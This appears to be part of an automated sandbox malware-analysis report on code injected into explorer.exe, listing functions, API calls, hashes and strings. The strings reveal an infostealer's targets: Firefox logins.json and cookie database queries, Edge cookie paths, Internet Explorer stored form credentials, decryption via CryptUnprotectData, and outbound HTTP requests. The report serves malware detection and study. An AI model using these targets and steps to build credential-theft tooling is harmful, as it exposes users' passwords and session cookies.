                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1378416451-0
                                                                                                                                                                                • Opcode ID: 4ec1b03ebaae6b942048c776db554904a5bba1bda2e9f407a98509fe0087c89a
                                                                                                                                                                                • Instruction ID: db99fd453ceb0eadc70f3ab488e74d9cbb98e1ae876569a877c0eef864315a16
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ec1b03ebaae6b942048c776db554904a5bba1bda2e9f407a98509fe0087c89a
                                                                                                                                                                                • Instruction Fuzzy Hash: 75319E32311F518AEB10CF26F80836D77A1BB99BD4F248529CB9A93759EF39D4468B40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 1610889594-2766056989
                                                                                                                                                                                • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                • Instruction ID: 5016cd2bde01d1e0f0bbf4149a479f3421eeb603811931d6c64dd3ed77b318fc
                                                                                                                                                                                • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41D536229B8586DB60DB15E4807AAB3A4F7CCB94F409135EA8E47B68DF3CC564CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FolderPathlstrcat
                                                                                                                                                                                • String ID: \Mozilla\Firefox\Profiles\$formhistory.sqlite$logins.json
                                                                                                                                                                                • API String ID: 1210066190-636801707
                                                                                                                                                                                • Opcode ID: 2e3fdeca2198d4f2e1d5fefdc3b55a996d425bdbccd106553a4d9ac34f9653ec
                                                                                                                                                                                • Instruction ID: 258b6e2be2a1a6d3ed096851e6d4cbc2ae640fa206374bf76f9b31aee73b9f01
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e3fdeca2198d4f2e1d5fefdc3b55a996d425bdbccd106553a4d9ac34f9653ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 06315A36214F90D2EB649B25F85479A73A4F794384F84093AA98E53B68DF3DC849CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetFolderPathA.SHELL32 ref: 0E625DB6
                                                                                                                                                                                • SHGetFolderPathA.SHELL32 ref: 0E625E03
                                                                                                                                                                                • lstrcatA.KERNEL32 ref: 0E625E19
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcpyA.KERNEL32 ref: 0E626633
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrlenA.KERNEL32 ref: 0E62663E
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626662
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626674
                                                                                                                                                                                  • Part of subcall function 0E626604: FindFirstFileA.KERNEL32 ref: 0E626683
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcpyA.KERNEL32 ref: 0E6266D2
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E6266E8
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E6266F7
                                                                                                                                                                                  • Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626709
                                                                                                                                                                                  • Part of subcall function 0E626604: FindNextFileA.KERNEL32 ref: 0E62680B
                                                                                                                                                                                  • Part of subcall function 0E626604: FindClose.KERNEL32 ref: 0E62681C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$Find$FileFolderPathlstrcpy$CloseFirstNextlstrlen
                                                                                                                                                                                • String ID: .cookie$.txt$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
                                                                                                                                                                                • API String ID: 4173611902-356491070
                                                                                                                                                                                • Opcode ID: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
                                                                                                                                                                                • Instruction ID: 220ae853cdd48a62214f164dd4fa3665551d7e862511993026e00d448b80a515
                                                                                                                                                                                • Opcode Fuzzy Hash: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
                                                                                                                                                                                • Instruction Fuzzy Hash: 47116D72318F8593DB20DB10F844B8A7365F3A8384F80553AE68E43A68EF3DD608CB00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                • Instruction ID: 5b56df43b8afd65d3162a7ab842b399a27db45d08615d791dcbc6e59e9dbd298
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                • Instruction Fuzzy Hash: 55316D35228B4083E764DBB6F8407DAB278FB8CBA4F804335E96A466E4DF78C565C701
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                • HttpOpenRequestA.WININET ref: 03115305
                                                                                                                                                                                • HttpOpenRequestA.WININET ref: 03115391
                                                                                                                                                                                • InternetSetOptionA.WININET ref: 031153D0
                                                                                                                                                                                • HttpSendRequestA.WININET ref: 03115418
                                                                                                                                                                                • HttpSendRequestA.WININET ref: 03115439
                                                                                                                                                                                  • Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2140924187-0
                                                                                                                                                                                • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                • Instruction ID: f2eb4bd5cfbe046ea4978c2ceb4202e026aeaeed87daf8e00d8872c853810973
                                                                                                                                                                                • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A71DF76209B848AEB61DB14F4803DAB7A5F7CD784F544126EAC947A68EF7CC1A4CF40
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
                                                                                                                                                                                  • Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD
                                                                                                                                                                                • CopyFileA.KERNEL32 ref: 0E625D1B
                                                                                                                                                                                • DeleteFileA.KERNEL32 ref: 0E625D76
                                                                                                                                                                                Strings
                                                                                                                                                                                • SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies, xrefs: 0E625D53
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Filelstrcatlstrlen$CopyDeletePathTempwsprintf
                                                                                                                                                                                • String ID: SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies
                                                                                                                                                                                • API String ID: 4185374037-3522861938
                                                                                                                                                                                • Opcode ID: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                                                                                                                                • Instruction ID: c7842f32f9a888baff504d0a8f096e25f59aeb450b72ed7ab20c890dc61fd6ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D01D432724E9583EB60DB51F854BA95370F7D9385F801825DA4A5BA18DF3AC908CF44
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NameUserwsprintf
                                                                                                                                                                                • String ID: jones
                                                                                                                                                                                • API String ID: 54179028-3844744938
                                                                                                                                                                                • Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                                                                • Instruction ID: f883b669a074776d88efff8c344976d27363d0ddbddc2f71675e7ee506cd8169
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF07572234A8797EB51DF14E8503E96325FB99744FC05131A14D46558EF7CC71AD740
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstVolumeW.KERNEL32 ref: 03118C6A
                                                                                                                                                                                • GetVolumeInformationW.KERNEL32 ref: 03118CBE
                                                                                                                                                                                • FindVolumeClose.KERNEL32 ref: 03118CCD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 586543143-0
                                                                                                                                                                                • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                • Instruction ID: fa5ef3906b1834f54a347b08f39eadd560a72d972d0bc0df829e893919cd28b3
                                                                                                                                                                                • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8511C576219A40D7D761DB10E4843DBB7B4F789360F904636E2AA42AA8DF7CCA59CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32 ref: 03117E48
                                                                                                                                                                                  • Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                • CreateThread.KERNEL32 ref: 03117F29
                                                                                                                                                                                  • Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryVirtual$AllocateByteCharCreateFreeMultiThreadWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3722359027-0
                                                                                                                                                                                • Opcode ID: 110fcd49ead3f1d7ea41d2ccc20f71e47c30cd7d15cfbb7269726683b3043d6e
                                                                                                                                                                                • Instruction ID: fa00cae9c2a5c5df36045857d2a5d5f1837d0b7f6db5204a5a55c575136e7294
                                                                                                                                                                                • Opcode Fuzzy Hash: 110fcd49ead3f1d7ea41d2ccc20f71e47c30cd7d15cfbb7269726683b3043d6e
                                                                                                                                                                                • Instruction Fuzzy Hash: A2311536228B8087DB50DB11F48479FB7A4F3C8784F505126EA8A87BA8CF7CC555CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                                • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                • Instruction ID: f9f9ef0b467f842a10c4d4e6863531a6f17eb60b4bb4ce95bb91a3b022732f0b
                                                                                                                                                                                • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F41A576619A848BCB64CB19E49036AB7A0F3C8B84F144126EB8E83B28DB3CC551CF04
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileInternetRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 778332206-0
                                                                                                                                                                                • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                • Instruction ID: a09b35b6fcfc695f40a8d28b5db44180874963aa21750d095899d02d2d241045
                                                                                                                                                                                • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D21E8363296859BDB65CA15E45479AB3E2F3CCB88F404135EA8E83B58EB7DC654CF00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                • Instruction ID: a68cd68012bde66c314e436f151a151afad5d37626cd6dd8c320bec3abb99d1a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                • Instruction Fuzzy Hash: EAE04F72624B8086D764DB20F48438A67A5F3CC394F845026EA8B46B28DF3DC295CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 1a60978effe268093f02d1f69aa5cacc1ea8261bca1eb0ed8a70301b3caa8571
                                                                                                                                                                                • Instruction ID: 0c17575200b1528aa24724fe68eaddf42accb549b42d3d215b8b2a389dac8496
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a60978effe268093f02d1f69aa5cacc1ea8261bca1eb0ed8a70301b3caa8571
                                                                                                                                                                                • Instruction Fuzzy Hash: 67D01775554B4086E715CF10A8407CA73A8F38C354FC0021ADA8D02324CF3CC31ACB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                • Opcode ID: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                                                                                                                                • Instruction ID: 120e8e426b90a8dff9e4cdf8ea9aed632cb29270aea9fe7bc689867572d1dca1
                                                                                                                                                                                • Opcode Fuzzy Hash: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                                                                                                                                • Instruction Fuzzy Hash: E8E0396075624085EE1467A2B9543F553989BC57E2F886B289E3F873C2EE28C8C1C325
                                                                                                                                                                                APIs
                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 0E6280F6
                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 0E628130
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                • String ID: ---$created$encryptedPassword$encryptedUsername$hostname$lastused$logins$password$timeCreated$timeLastUsed$url$username
                                                                                                                                                                                • API String ID: 233258989-2527365753
                                                                                                                                                                                • Opcode ID: 3ab754e0dbf1d9f1fcf7561f5f0ed1f4612bf7d214603b1d67e64441ae75829c
                                                                                                                                                                                • Instruction ID: 1f7b2eed5f1ffd29b8cb920073798b569480fc9c95a7bf6d5bf972a6ac923340
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ab754e0dbf1d9f1fcf7561f5f0ed1f4612bf7d214603b1d67e64441ae75829c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C91B121316FA181DA29DB62FC187A963A1FB85BD0F88463E8D1E27B54DF39DD05CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • PRIMARY KEY missing on table %s, xrefs: 0E66A02F
                                                                                                                                                                                • sqlite_sequence, xrefs: 0E66A583
                                                                                                                                                                                • AUTOINCREMENT not allowed on WITHOUT ROWID tables, xrefs: 0E66A01C
                                                                                                                                                                                • view, xrefs: 0E66A219
                                                                                                                                                                                • CREATE %s %.*s, xrefs: 0E66A481
                                                                                                                                                                                • TABLE, xrefs: 0E66A212
                                                                                                                                                                                • table, xrefs: 0E66A224
                                                                                                                                                                                • UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d, xrefs: 0E66A498
                                                                                                                                                                                • tbl_name='%q' AND type!='trigger', xrefs: 0E66A52B
                                                                                                                                                                                • CREATE TABLE %Q.sqlite_sequence(name,seq), xrefs: 0E66A519
                                                                                                                                                                                • must have at least one non-generated column, xrefs: 0E66A164
                                                                                                                                                                                • VIEW, xrefs: 0E66A208
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _cwprintf_s_l
                                                                                                                                                                                • String ID: AUTOINCREMENT not allowed on WITHOUT ROWID tables$CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$PRIMARY KEY missing on table %s$TABLE$UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$must have at least one non-generated column$sqlite_sequence$table$tbl_name='%q' AND type!='trigger'$view
                                                                                                                                                                                • API String ID: 2941638530-2858624202
                                                                                                                                                                                • Opcode ID: d8fa5887fb59ee858004418a0ffaaab939b2e7d8b109de72841373869f685409
                                                                                                                                                                                • Instruction ID: 354a9b044cc4233e149ca4802ccdfb59934032480f32ce207b425c09027a2225
                                                                                                                                                                                • Opcode Fuzzy Hash: d8fa5887fb59ee858004418a0ffaaab939b2e7d8b109de72841373869f685409
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B029E723247808BDB29DF66F5507AE77A0F785B88F40892ACF4A67B14DB39D815CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0E628875
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFreeTask$CreateInitializeInstanceOpen
                                                                                                                                                                                • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                                                                • API String ID: 2849609203-680441574
                                                                                                                                                                                • Opcode ID: 8543e0224f209ace2cb915d059e2d896b75a719bdad6af399627b3eae6d821da
                                                                                                                                                                                • Instruction ID: 260b1965bf0db88c2a04a9e64a9afa5316974f77ed321274b5c47e3feb64cdc7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8543e0224f209ace2cb915d059e2d896b75a719bdad6af399627b3eae6d821da
                                                                                                                                                                                • Instruction Fuzzy Hash: C8416932711A518AEB14CF79E8907AD3360FB98B88F94452ADE4A57B28DF39C948C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __swprintf_l_cwprintf_s_l
                                                                                                                                                                                • String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                                                                                                                • API String ID: 1809257383-4294478755
                                                                                                                                                                                • Opcode ID: 632da42df10d7e8ea20d2bac33d54132107c49394ff375faad723cf653b6cc55
                                                                                                                                                                                • Instruction ID: df5aa6d78d29b0c5941627988c12049547b6215a333bb175f0e04ea00eae188e
                                                                                                                                                                                • Opcode Fuzzy Hash: 632da42df10d7e8ea20d2bac33d54132107c49394ff375faad723cf653b6cc55
                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF103A2351B9596DF25DFA6E09436A67A1FB8AF84F088529CF5E07754EF39C842C300
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlCaptureContext.KERNEL32 ref: 0E6B1E19
                                                                                                                                                                                • RtlLookupFunctionEntry.KERNEL32 ref: 0E6B1E31
                                                                                                                                                                                • RtlVirtualUnwind.KERNEL32 ref: 0E6B1E6C
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0E6B1EA5
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0E6B1EAF
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 0E6B1EBA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                • Opcode ID: 7fae68c0a360caa51e560666ef8391d39fa419a8a3bb68cb805654250a835efc
                                                                                                                                                                                • Instruction ID: 9752b5a2239773c1604470b86814680d64605a3dcff9f49e2688fa7e3cf963da
                                                                                                                                                                                • Opcode Fuzzy Hash: 7fae68c0a360caa51e560666ef8391d39fa419a8a3bb68cb805654250a835efc
                                                                                                                                                                                • Instruction Fuzzy Hash: A3314E36214F809ADB20CF65F8503EE73A4F799798F54052AEA9D43B58EF78C956CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptUnprotectData.CRYPT32 ref: 0E62604E
                                                                                                                                                                                  • Part of subcall function 0E626078: BCryptOpenAlgorithmProvider.BCRYPT ref: 0E6260C1
                                                                                                                                                                                  • Part of subcall function 0E626078: BCryptSetProperty.BCRYPT ref: 0E6260EA
                                                                                                                                                                                  • Part of subcall function 0E626078: BCryptGetProperty.BCRYPT ref: 0E626119
                                                                                                                                                                                  • Part of subcall function 0E626078: BCryptGetProperty.BCRYPT ref: 0E62614C
                                                                                                                                                                                  • Part of subcall function 0E626078: BCryptGenerateSymmetricKey.BCRYPT ref: 0E626180
                                                                                                                                                                                  • Part of subcall function 0E626078: GetProcessHeap.KERNEL32 ref: 0E62618E
                                                                                                                                                                                  • Part of subcall function 0E626078: HeapAlloc.KERNEL32 ref: 0E6261A1
                                                                                                                                                                                  • Part of subcall function 0E626078: GetProcessHeap.KERNEL32 ref: 0E6262D3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$HeapProperty$Process$AlgorithmAllocDataGenerateOpenProviderSymmetricUnprotect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3167333787-0
                                                                                                                                                                                • Opcode ID: a79036e9377552ae0134f5617056aeee9adf5348f99882a79223a1d056d376af
                                                                                                                                                                                • Instruction ID: 0c379197942385e3414dd0640b07ec729498fbe796621c4e0a734c501c383914
                                                                                                                                                                                • Opcode Fuzzy Hash: a79036e9377552ae0134f5617056aeee9adf5348f99882a79223a1d056d376af
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D01F972A15B91C5EB258B26F224B7E7790E745BC8F44C02DCA814A744CBBDC8D1DF00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
